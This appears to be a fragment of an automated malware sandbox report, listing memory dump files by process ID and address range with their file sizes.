                        • memory/468-73-0x0000000022AB0000-0x0000000022AE4000-memory.dmp

                          Filesize

                          208KB

                        • memory/468-69-0x0000000022AB0000-0x0000000022AE4000-memory.dmp

                          Filesize

                          208KB

                        • memory/468-201-0x00000000233D0000-0x00000000233E9000-memory.dmp

                          Filesize

                          100KB

                        • memory/468-72-0x0000000022AB0000-0x0000000022AE4000-memory.dmp

                          Filesize

                          208KB

                        • memory/468-60-0x0000000001000000-0x0000000002254000-memory.dmp

                          Filesize

                          18.3MB

                        • memory/468-197-0x00000000233D0000-0x00000000233E9000-memory.dmp

                          Filesize

                          100KB

                        • memory/1752-86-0x0000000000400000-0x0000000000478000-memory.dmp

                          Filesize

                          480KB

                        • memory/1752-84-0x0000000000400000-0x0000000000478000-memory.dmp

                          Filesize

                          480KB

                        • memory/1752-90-0x0000000000400000-0x0000000000478000-memory.dmp

                          Filesize

                          480KB

                        • memory/1752-82-0x0000000000400000-0x0000000000478000-memory.dmp

                          Filesize

                          480KB

                        • memory/2088-91-0x0000000000400000-0x0000000000424000-memory.dmp

                          Filesize

                          144KB

                        • memory/2088-92-0x0000000000400000-0x0000000000424000-memory.dmp

                          Filesize

                          144KB

                        • memory/2088-88-0x0000000000400000-0x0000000000424000-memory.dmp

                          Filesize

                          144KB

                        • memory/2700-87-0x0000000000400000-0x0000000000462000-memory.dmp

                          Filesize

                          392KB

                        • memory/2700-83-0x0000000000400000-0x0000000000462000-memory.dmp

                          Filesize

                          392KB

                        • memory/2700-89-0x0000000000400000-0x0000000000462000-memory.dmp

                          Filesize

                          392KB

                        • memory/3432-47-0x0000000008890000-0x0000000008E34000-memory.dmp

                          Filesize

                          5.6MB

                        • memory/3432-46-0x0000000007640000-0x0000000007662000-memory.dmp

                          Filesize

                          136KB

                        • memory/3432-29-0x0000000005C90000-0x0000000005CF6000-memory.dmp

                          Filesize

                          408KB

                        • memory/3432-28-0x0000000005C20000-0x0000000005C86000-memory.dmp

                          Filesize

                          408KB

                        • memory/3432-41-0x0000000006400000-0x000000000641E000-memory.dmp

                          Filesize

                          120KB

                        • memory/3432-49-0x0000000008E40000-0x000000000D403000-memory.dmp

                          Filesize

                          69.8MB

                        • memory/3432-42-0x0000000006420000-0x000000000646C000-memory.dmp

                          Filesize

                          304KB

                        • memory/3432-27-0x0000000005B80000-0x0000000005BA2000-memory.dmp

                          Filesize

                          136KB

                        • memory/3432-26-0x00000000054D0000-0x0000000005AF8000-memory.dmp

                          Filesize

                          6.2MB

                        • memory/3432-25-0x0000000004E20000-0x0000000004E56000-memory.dmp

                          Filesize

                          216KB

                        • memory/3432-35-0x0000000005DA0000-0x00000000060F4000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/3432-45-0x00000000076B0000-0x0000000007746000-memory.dmp

                          Filesize

                          600KB

                        • memory/3432-43-0x0000000007C60000-0x00000000082DA000-memory.dmp

                          Filesize

                          6.5MB

                        • memory/3432-44-0x0000000006980000-0x000000000699A000-memory.dmp

                          Filesize

                          104KB

                        • memory/5104-19-0x00007FFEC1A60000-0x00007FFEC2521000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/5104-21-0x00007FFEC1A60000-0x00007FFEC2521000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/5104-24-0x00007FFEC1A60000-0x00007FFEC2521000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/5104-18-0x00007FFEC1A63000-0x00007FFEC1A65000-memory.dmp

                          Filesize

                          8KB

                        • memory/5104-16-0x00007FFEC1A60000-0x00007FFEC2521000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/5104-15-0x00007FFEC1A60000-0x00007FFEC2521000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/5104-4-0x00007FFEC1A63000-0x00007FFEC1A65000-memory.dmp

                          Filesize

                          8KB

                        • memory/5104-5-0x000001ED225E0000-0x000001ED22602000-memory.dmp

                          Filesize

                          136KB